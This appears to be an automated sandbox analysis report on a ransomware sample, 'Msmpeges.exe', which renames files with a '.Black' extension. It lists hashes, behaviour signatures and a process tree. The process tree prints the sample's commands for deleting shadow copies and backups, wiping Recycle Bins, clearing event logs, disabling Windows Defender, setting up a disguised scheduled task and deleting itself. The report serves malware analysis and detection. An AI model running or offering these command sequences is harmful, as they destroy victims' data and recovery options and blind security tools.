Analysis
-
max time kernel
361s -
max time network
365s -
platform
windows7_x64 -
resource
win7-20230712-en -
resource tags
arch:x64arch:x86image:win7-20230712-enlocale:en-usos:windows7-x64system -
submitted
28/07/2023, 02:05
Static task
static1
Behavioral task
behavioral1
Sample
Msmpeges.exe
Resource
win7-20230712-en
Behavioral task
behavioral2
Sample
Msmpeges.exe
Resource
win10v2004-20230703-en
General
-
Target
Msmpeges.exe
-
Size
161KB
-
MD5
1dde7e42e33b9ed602f9c839cca7150b
-
SHA1
538a0f38f2745dff05c7f2e05fc1fe3165b7767e
-
SHA256
edcccd772c68c75f56becea7f54fb7ee677863b6beaca956c52ee20ec23b472d
-
SHA512
c4d5a9288237a7f06295ea7bbb86b8917b9caba23673421dad6277506771ce87e233bb6894c30802a1cda927c2a3360be49ea2c96c245e9dc5944461e256f2b0
-
SSDEEP
3072:X2+fD5RiXm5v/ACvkIF/o7t4PX5AvJ+juO4LcVm8:VfD5RiXmh5sIm7t4PyaELcE8
Malware Config
Signatures
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Renames multiple (7409) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
Deletes itself 1 IoCs
pid Process 1792 cmd.exe -
Executes dropped EXE 1 IoCs
pid Process 880 Diag.exe -
Loads dropped DLL 1 IoCs
pid Process 2324 cmd.exe -
Drops desktop.ini file(s) 2 IoCs
description ioc Process File opened for modification C:\$RECYCLE.BIN\S-1-5-21-1024678951-1535676557-2778719785-1000\desktop.ini Msmpeges.exe File opened for modification F:\$RECYCLE.BIN\S-1-5-21-1024678951-1535676557-2778719785-1000\desktop.ini Msmpeges.exe -
Enumerates connected drives 3 TTPs 25 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\G: Msmpeges.exe File opened (read-only) \??\K: Msmpeges.exe File opened (read-only) \??\O: Msmpeges.exe File opened (read-only) \??\T: Msmpeges.exe File opened (read-only) \??\Z: Msmpeges.exe File opened (read-only) \??\H: Msmpeges.exe File opened (read-only) \??\M: Msmpeges.exe File opened (read-only) \??\U: Msmpeges.exe File opened (read-only) \??\V: Msmpeges.exe File opened (read-only) \??\W: Msmpeges.exe File opened (read-only) \??\X: Msmpeges.exe File opened (read-only) \??\Y: Msmpeges.exe File opened (read-only) \??\F: Msmpeges.exe File opened (read-only) \??\B: Msmpeges.exe File opened (read-only) \??\E: Msmpeges.exe File opened (read-only) \??\I: Msmpeges.exe File opened (read-only) \??\L: Msmpeges.exe File opened (read-only) \??\P: Msmpeges.exe File opened (read-only) \??\A: Msmpeges.exe File opened (read-only) \??\J: Msmpeges.exe File opened (read-only) \??\N: Msmpeges.exe File opened (read-only) \??\Q: Msmpeges.exe File opened (read-only) \??\R: Msmpeges.exe File opened (read-only) \??\S: Msmpeges.exe File opened (read-only) \??\D: Msmpeges.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files (x86)\Microsoft Office\Templates\1033\ApothecaryResume.dotx.Black Msmpeges.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\ink\de-DE\rtscom.dll.mui Msmpeges.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD21518_.GIF Msmpeges.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\Maputo Msmpeges.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\FD01548_.WMF.Black Msmpeges.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\main.css Msmpeges.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18233_.WMF.Black Msmpeges.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-openide-explorer.jar Msmpeges.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Multimedia\MPP\MCIMPP.mpp.Black Msmpeges.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\bin\stopNetworkServer Msmpeges.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\LoginTool24x24Images.jpg Msmpeges.exe File created C:\Program Files\VideoLAN\VLC\locale\fy\Black_Recover.txt Msmpeges.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO02268_.WMF.Black Msmpeges.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\zh-CN\tipresx.dll.mui Msmpeges.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\Stationery\Music.emf Msmpeges.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Macau Msmpeges.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsColorChart.html.Black Msmpeges.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\MSWORD.OLB.Black Msmpeges.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-modules-profiler-api.xml.Black Msmpeges.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Biscay\TAB_OFF.GIF Msmpeges.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099193.GIF.Black Msmpeges.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SPRNG_01.MID Msmpeges.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Chicago Msmpeges.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Indian\Maldives.Black Msmpeges.exe File created C:\Program Files\VideoLAN\VLC\lua\http\js\Black_Recover.txt Msmpeges.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\AN04355_.WMF.Black Msmpeges.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0185796.WMF.Black Msmpeges.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0240175.WMF.Black Msmpeges.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\WB01296_.GIF.Black Msmpeges.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\EADOCUMENTAPPROVAL_REVIEW.XSN Msmpeges.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PAGESIZE\PGLBL108.XML Msmpeges.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR49F.GIF.Black Msmpeges.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Black_Recover.txt Msmpeges.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\SystemV\PST8 Msmpeges.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\LISTBOX.JPG Msmpeges.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.browser.attach.ja_5.5.0.165303.jar.Black Msmpeges.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\GROOVE_F_COL.HXK.Black Msmpeges.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18189_.WMF Msmpeges.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME17.CSS Msmpeges.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\es\LC_MESSAGES\vlc.mo Msmpeges.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\org-netbeans-lib-profiler.jar.Black Msmpeges.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\META-INF\ECLIPSE_.SF Msmpeges.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099185.JPG.Black Msmpeges.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD15272_.GIF.Black Msmpeges.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.touchpoint.eclipse.nl_zh_4.4.0.v20140623020002.jar.Black Msmpeges.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.simpleconfigurator.nl_ja_4.4.0.v20140623020002.jar Msmpeges.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Indian\Kerguelen.Black Msmpeges.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\OneNote\SendToOneNote.ini Msmpeges.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\THIRDPARTYLICENSEREADME.txt Msmpeges.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\MSQRY32.CHM Msmpeges.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\CONVERT\OLMAIL.FAE.Black Msmpeges.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx.ui_5.5.0.165303.jar Msmpeges.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\bg_FormsHomePage.gif.Black Msmpeges.exe File opened for modification C:\Program Files (x86)\Windows Media Player\it-IT\wmplayer.exe.mui Msmpeges.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\TN00095_.WMF.Black Msmpeges.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0183328.WMF.Black Msmpeges.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\INDUST\PREVIEW.GIF.Black Msmpeges.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.touchpoint.natives.nl_ja_4.4.0.v20140623020002.jar.Black Msmpeges.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0400001.PNG.Black Msmpeges.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Tegucigalpa Msmpeges.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0105328.WMF.Black Msmpeges.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0195788.WMF.Black Msmpeges.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Phoenix.Black Msmpeges.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\rtf_choosefont.gif.Black Msmpeges.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2840 schtasks.exe -
Interacts with shadow copies 2 TTPs 2 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 2424 vssadmin.exe 2820 vssadmin.exe -
Runs ping.exe 1 TTPs 2 IoCs
pid Process 1416 PING.EXE 2776 PING.EXE -
Suspicious behavior: EnumeratesProcesses 18 IoCs
pid Process 2008 powershell.exe 2796 powershell.exe 2780 powershell.exe 2468 Msmpeges.exe 2468 Msmpeges.exe 2468 Msmpeges.exe 2468 Msmpeges.exe 2468 Msmpeges.exe 2468 Msmpeges.exe 2468 Msmpeges.exe 2468 Msmpeges.exe 2468 Msmpeges.exe 2468 Msmpeges.exe 2468 Msmpeges.exe 2468 Msmpeges.exe 216 powershell.exe 2308 powershell.exe 1116 powershell.exe -
Suspicious use of AdjustPrivilegeToken 16 IoCs
description pid Process Token: SeDebugPrivilege 2468 Msmpeges.exe Token: SeRestorePrivilege 2468 Msmpeges.exe Token: SeBackupPrivilege 2468 Msmpeges.exe Token: SeTakeOwnershipPrivilege 2468 Msmpeges.exe Token: SeAuditPrivilege 2468 Msmpeges.exe Token: SeSecurityPrivilege 2468 Msmpeges.exe Token: SeIncBasePriorityPrivilege 2468 Msmpeges.exe Token: SeBackupPrivilege 1072 vssvc.exe Token: SeRestorePrivilege 1072 vssvc.exe Token: SeAuditPrivilege 1072 vssvc.exe Token: SeDebugPrivilege 2008 powershell.exe Token: SeDebugPrivilege 2796 powershell.exe Token: SeDebugPrivilege 2780 powershell.exe Token: SeDebugPrivilege 216 powershell.exe Token: SeDebugPrivilege 2308 powershell.exe Token: SeDebugPrivilege 1116 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2468 wrote to memory of 2560 2468 Msmpeges.exe 29 PID 2468 wrote to memory of 2560 2468 Msmpeges.exe 29 PID 2468 wrote to memory of 2560 2468 Msmpeges.exe 29 PID 2468 wrote to memory of 2560 2468 Msmpeges.exe 29 PID 2468 wrote to memory of 2872 2468 Msmpeges.exe 31 PID 2468 wrote to memory of 2872 2468 Msmpeges.exe 31 PID 2468 wrote to memory of 2872 2468 Msmpeges.exe 31 PID 2468 wrote to memory of 2872 2468 Msmpeges.exe 31 PID 2468 wrote to memory of 2936 2468 Msmpeges.exe 32 PID 2468 wrote to memory of 2936 2468 Msmpeges.exe 32 PID 2468 wrote to memory of 2936 2468 Msmpeges.exe 32 PID 2468 wrote to memory of 2936 2468 Msmpeges.exe 32 PID 2468 wrote to memory of 3000 2468 Msmpeges.exe 35 PID 2468 wrote to memory of 3000 2468 Msmpeges.exe 35 PID 2468 wrote to memory of 3000 2468 Msmpeges.exe 35 PID 2468 wrote to memory of 3000 2468 Msmpeges.exe 35 PID 2468 wrote to memory of 2288 2468 Msmpeges.exe 36 PID 2468 wrote to memory of 2288 2468 Msmpeges.exe 36 PID 2468 wrote to memory of 2288 2468 Msmpeges.exe 36 PID 2468 wrote to memory of 2288 2468 Msmpeges.exe 36 PID 2468 wrote to memory of 1548 2468 Msmpeges.exe 38 PID 2468 wrote to memory of 1548 2468 Msmpeges.exe 38 PID 2468 wrote to memory of 1548 2468 Msmpeges.exe 38 PID 2468 wrote to memory of 1548 2468 Msmpeges.exe 38 PID 2468 wrote to memory of 2992 2468 Msmpeges.exe 39 PID 2468 wrote to memory of 2992 2468 Msmpeges.exe 39 PID 2468 wrote to memory of 2992 2468 Msmpeges.exe 39 PID 2468 wrote to memory of 2992 2468 Msmpeges.exe 39 PID 2468 wrote to memory of 1784 2468 Msmpeges.exe 40 PID 2468 wrote to memory of 1784 2468 Msmpeges.exe 40 PID 2468 wrote to memory of 1784 2468 Msmpeges.exe 40 PID 2468 wrote to memory of 1784 2468 Msmpeges.exe 40 PID 2468 wrote to memory of 2916 2468 Msmpeges.exe 41 PID 2468 wrote to memory of 2916 2468 Msmpeges.exe 41 PID 2468 wrote to memory of 2916 2468 Msmpeges.exe 41 PID 2468 wrote to memory of 2916 2468 Msmpeges.exe 41 PID 2560 wrote to memory of 2840 2560 cmd.exe 42 PID 2560 wrote to memory of 2840 2560 cmd.exe 42 PID 2560 wrote to memory of 2840 2560 cmd.exe 42 PID 2560 wrote to memory of 2840 2560 cmd.exe 42 PID 2992 wrote to memory of 2008 2992 cmd.exe 49 PID 2992 wrote to memory of 2008 2992 cmd.exe 49 PID 2992 wrote to memory of 2008 2992 cmd.exe 49 PID 2992 wrote to memory of 2008 2992 cmd.exe 49 PID 1784 wrote to memory of 2796 1784 cmd.exe 50 PID 1784 wrote to memory of 2796 1784 cmd.exe 50 PID 1784 wrote to memory of 2796 1784 cmd.exe 50 PID 1784 wrote to memory of 2796 1784 cmd.exe 50 PID 2916 wrote to memory of 2484 2916 cmd.exe 51 PID 2916 wrote to memory of 2484 2916 cmd.exe 51 PID 2916 wrote to memory of 2484 2916 cmd.exe 51 PID 2916 wrote to memory of 2484 2916 cmd.exe 51 PID 3000 wrote to memory of 2780 3000 cmd.exe 52 PID 3000 wrote to memory of 2780 3000 cmd.exe 52 PID 3000 wrote to memory of 2780 3000 cmd.exe 52 PID 3000 wrote to memory of 2780 3000 cmd.exe 52 PID 1548 wrote to memory of 2424 1548 cmd.exe 53 PID 1548 wrote to memory of 2424 1548 cmd.exe 53 PID 1548 wrote to memory of 2424 1548 cmd.exe 53 PID 1548 wrote to memory of 2424 1548 cmd.exe 53 PID 2468 wrote to memory of 2388 2468 Msmpeges.exe 60 PID 2468 wrote to memory of 2388 2468 Msmpeges.exe 60 PID 2468 wrote to memory of 2388 2468 Msmpeges.exe 60 PID 2468 wrote to memory of 2388 2468 Msmpeges.exe 60 -
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\Msmpeges.exe"C:\Users\Admin\AppData\Local\Temp\Msmpeges.exe"1⤵
- Drops desktop.ini file(s)
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2468 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Update BETA" /TR "C:\Users\Admin\AppData\Local\Temp\Msmpeges.exe" /F2⤵
- Suspicious use of WriteProcessMemory
PID:2560 -
C:\Windows\SysWOW64\schtasks.exeSCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Update BETA" /TR "C:\Users\Admin\AppData\Local\Temp\Msmpeges.exe" /F3⤵
- Creates scheduled task(s)
PID:2840
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c rd /s /q P:\$RECYCLE.BIN,Q:\$RECYCLE.BIN,R:\$RECYCLE.BIN,S:\$RECYCLE.BIN,T:\$RECYCLE.BIN,U:\$RECYCLE.BIN,V:\$RECYCLE.BIN,W:\$RECYCLE.BIN,X:\$RECYCLE.BIN,F:\$RECYCLE.BIN,G:\$RECYCLE.BIN,K:\$RECYCLE.BIN,L:\$RECYCLE.BIN,M:\$RECYCLE.BIN,N:\$RECYCLE.BIN,O:\$RECYCLE.BIN,Y:\$RECYCLE.BIN,Z:\$RECYCLE.BIN,A:\$RECYCLE.BIN,B:\$RECYCLE.BIN,C:\$RECYCLE.BIN,D:\$RECYCLE.BIN,E:\$RECYCLE.BIN,H:\$RECYCLE.BIN,I:\$RECYCLE.BIN,J:\$RECYCLE.BIN2⤵PID:2872
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c rd /s /q P:\Recycler,Q:\Recycler,R:\Recycler,S:\Recycler,T:\Recycler,U:\Recycler,V:\Recycler,W:\Recycler,X:\Recycler,F:\Recycler,G:\Recycler,K:\Recycler,L:\Recycler,M:\Recycler,N:\Recycler,O:\Recycler,Y:\Recycler,Z:\Recycler,A:\Recycler,B:\Recycler,C:\Recycler,D:\Recycler,E:\Recycler,H:\Recycler,I:\Recycler,J:\Recycler2⤵PID:2936
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c powershell -inputformat none -outputformat none -NonInteractive -Command Remove -Item 'd:\$RECYCLE.BIN','c:\$RECYCLE.BIN' -Recurse -Force2⤵
- Suspicious use of WriteProcessMemory
PID:3000 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Remove -Item 'd:\$RECYCLE.BIN','c:\$RECYCLE.BIN' -Recurse -Force3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2780
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c FOR / F "delims=" %I IN ('WEVTUTIL EL') DO (WEVTUTIL CL "%I")2⤵PID:2288
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe delete shadows /all /quiet&&wbadmin delete catalog -quiet && bcdedit.exe /set {current} nx AlwaysOff && wmic SHADOWCOPY DELETE2⤵
- Suspicious use of WriteProcessMemory
PID:1548 -
C:\Windows\SysWOW64\vssadmin.exevssadmin.exe delete shadows /all /quiet3⤵
- Interacts with shadow copies
PID:2424
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "%s"2⤵
- Suspicious use of WriteProcessMemory
PID:2992 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "%s"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2008
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c powershell -inputformat none -outputformat none -NonInteractive -Command Remove-WindowsFeature Windows-Defender&&powershell -inputformat none -outputformat none -NonInteractive -Command Windows-Defender-GUI&&powershell -inputformat none -outputformat none -NonInteractive -Command New-ItemProperty -Path "HKLM:SOFTWAREPoliciesMicrosoftWindows Defender" -Name DisableAntiSpyware -Value 1 -PropertyType DWORD -Force2⤵
- Suspicious use of WriteProcessMemory
PID:1784 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Remove-WindowsFeature Windows-Defender3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2796
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c powershell -inputformat none -outputformat none -NonInteractive -Command Get-Service WinDefend | Stop-Service -PassThru | Set-Service -StartupType Disabled&&powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true2⤵
- Suspicious use of WriteProcessMemory
PID:2916 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Get-Service WinDefend3⤵PID:2484
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c rd /s /q P:\$RECYCLE.BIN,Q:\$RECYCLE.BIN,R:\$RECYCLE.BIN,S:\$RECYCLE.BIN,T:\$RECYCLE.BIN,U:\$RECYCLE.BIN,V:\$RECYCLE.BIN,W:\$RECYCLE.BIN,X:\$RECYCLE.BIN,F:\$RECYCLE.BIN,G:\$RECYCLE.BIN,K:\$RECYCLE.BIN,L:\$RECYCLE.BIN,M:\$RECYCLE.BIN,N:\$RECYCLE.BIN,O:\$RECYCLE.BIN,Y:\$RECYCLE.BIN,Z:\$RECYCLE.BIN,A:\$RECYCLE.BIN,B:\$RECYCLE.BIN,C:\$RECYCLE.BIN,D:\$RECYCLE.BIN,E:\$RECYCLE.BIN,H:\$RECYCLE.BIN,I:\$RECYCLE.BIN,J:\$RECYCLE.BIN2⤵PID:2388
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c rd /s /q P:\Recycler,Q:\Recycler,R:\Recycler,S:\Recycler,T:\Recycler,U:\Recycler,V:\Recycler,W:\Recycler,X:\Recycler,F:\Recycler,G:\Recycler,K:\Recycler,L:\Recycler,M:\Recycler,N:\Recycler,O:\Recycler,Y:\Recycler,Z:\Recycler,A:\Recycler,B:\Recycler,C:\Recycler,D:\Recycler,E:\Recycler,H:\Recycler,I:\Recycler,J:\Recycler2⤵PID:2220
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c powershell -inputformat none -outputformat none -NonInteractive -Command Remove -Item 'd:\$RECYCLE.BIN','c:\$RECYCLE.BIN' -Recurse -Force2⤵PID:1856
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Remove -Item 'd:\$RECYCLE.BIN','c:\$RECYCLE.BIN' -Recurse -Force3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:216
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c FOR / F "delims=" %I IN ('WEVTUTIL EL') DO (WEVTUTIL CL "%I")2⤵PID:2980
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe delete shadows /all /quiet&&wbadmin delete catalog -quiet && bcdedit.exe /set {current} nx AlwaysOff && wmic SHADOWCOPY DELETE2⤵PID:2368
-
C:\Windows\SysWOW64\vssadmin.exevssadmin.exe delete shadows /all /quiet3⤵
- Interacts with shadow copies
PID:2820
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "%s"2⤵PID:2836
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "%s"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1116
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c powershell -inputformat none -outputformat none -NonInteractive -Command Remove-WindowsFeature Windows-Defender&&powershell -inputformat none -outputformat none -NonInteractive -Command Windows-Defender-GUI&&powershell -inputformat none -outputformat none -NonInteractive -Command New-ItemProperty -Path "HKLM:SOFTWAREPoliciesMicrosoftWindows Defender" -Name DisableAntiSpyware -Value 1 -PropertyType DWORD -Force2⤵PID:1804
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Remove-WindowsFeature Windows-Defender3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2308
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c powershell -inputformat none -outputformat none -NonInteractive -Command Get-Service WinDefend | Stop-Service -PassThru | Set-Service -StartupType Disabled&&powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true2⤵PID:1100
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Get-Service WinDefend3⤵PID:2344
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 > nul & del "C:\Users\Admin\AppData\Local\Temp\Msmpeges.exe"2⤵
- Deletes itself
PID:1792 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- Runs ping.exe
PID:1416
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Delete /TN "Windows Update BETA" /F2⤵PID:1672
-
C:\Windows\SysWOW64\schtasks.exeSCHTASKS.exe /Delete /TN "Windows Update BETA" /F3⤵PID:2060
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c "C:\ProgramData\Diag.exe"2⤵
- Loads dropped DLL
PID:2324
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1072
-
C:\ProgramData\Diag.exeC:\ProgramData\Diag.exe1⤵
- Executes dropped EXE
PID:880 -
C:\Windows\SysWOW64\cmd.execmd.exe /c ping 127.0.0.1 -n 5 > nul & del "C:\ProgramData\Diag.exe"2⤵PID:2936
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- Runs ping.exe
PID:2776
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
129B
MD5a526b9e7c716b3489d8cc062fbce4005
SHA12df502a944ff721241be20a9e449d2acd07e0312
SHA256e1b9ce9b57957b1a0607a72a057d6b7a9b34ea60f3f8aa8f38a3af979bd23066
SHA512d83d4c656c96c3d1809ad06ce78fa09a77781461c99109e4b81d1a186fc533a7e72d65a4cb7edf689eeccda8f687a13d3276f1111a1e72f7c3cd92a49bce0f88
-
Filesize
554B
MD587ca8cea5510cfcb42e6674d7aa9ef59
SHA1ef5dd9f0663e769654816e361344133f7d480300
SHA256da777873d645fec9054e02b37c6e156e779e778ef6a5dd27b4a05a40f68b021d
SHA512690c49d82649bb9356f986b903efb17a6998f94f53273876e4da3b621fd2c7c6e32c50f318e86cb7e8d96b24fd953a20d410deb71905d96cb719660931abd800
-
Filesize
6KB
MD539728325879572ffe56a194319f2731f
SHA13898a219352dd3aedc54ff924b01317107c9ce2f
SHA2568e3ff1907d973d91167c2d74ac8414496d7f430687eef52e3201721e01513761
SHA5127d80af3e2df1c02bfda76e5ada4b4ce25921418cfcd7f26434293e746968f4187f6c9cf5bbb1c7c4703117eaabdd958700f7b1cefcfa44bd11afe95ad7f1599b
-
Filesize
6KB
MD539728325879572ffe56a194319f2731f
SHA13898a219352dd3aedc54ff924b01317107c9ce2f
SHA2568e3ff1907d973d91167c2d74ac8414496d7f430687eef52e3201721e01513761
SHA5127d80af3e2df1c02bfda76e5ada4b4ce25921418cfcd7f26434293e746968f4187f6c9cf5bbb1c7c4703117eaabdd958700f7b1cefcfa44bd11afe95ad7f1599b
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\SK5BM84QQ6I2RJFYOWNL.temp
Filesize7KB
MD55836772ea003a5298b48c9664f9bb2e1
SHA129830dca2d68d3bc2ecca975a3907f7d770c81b4
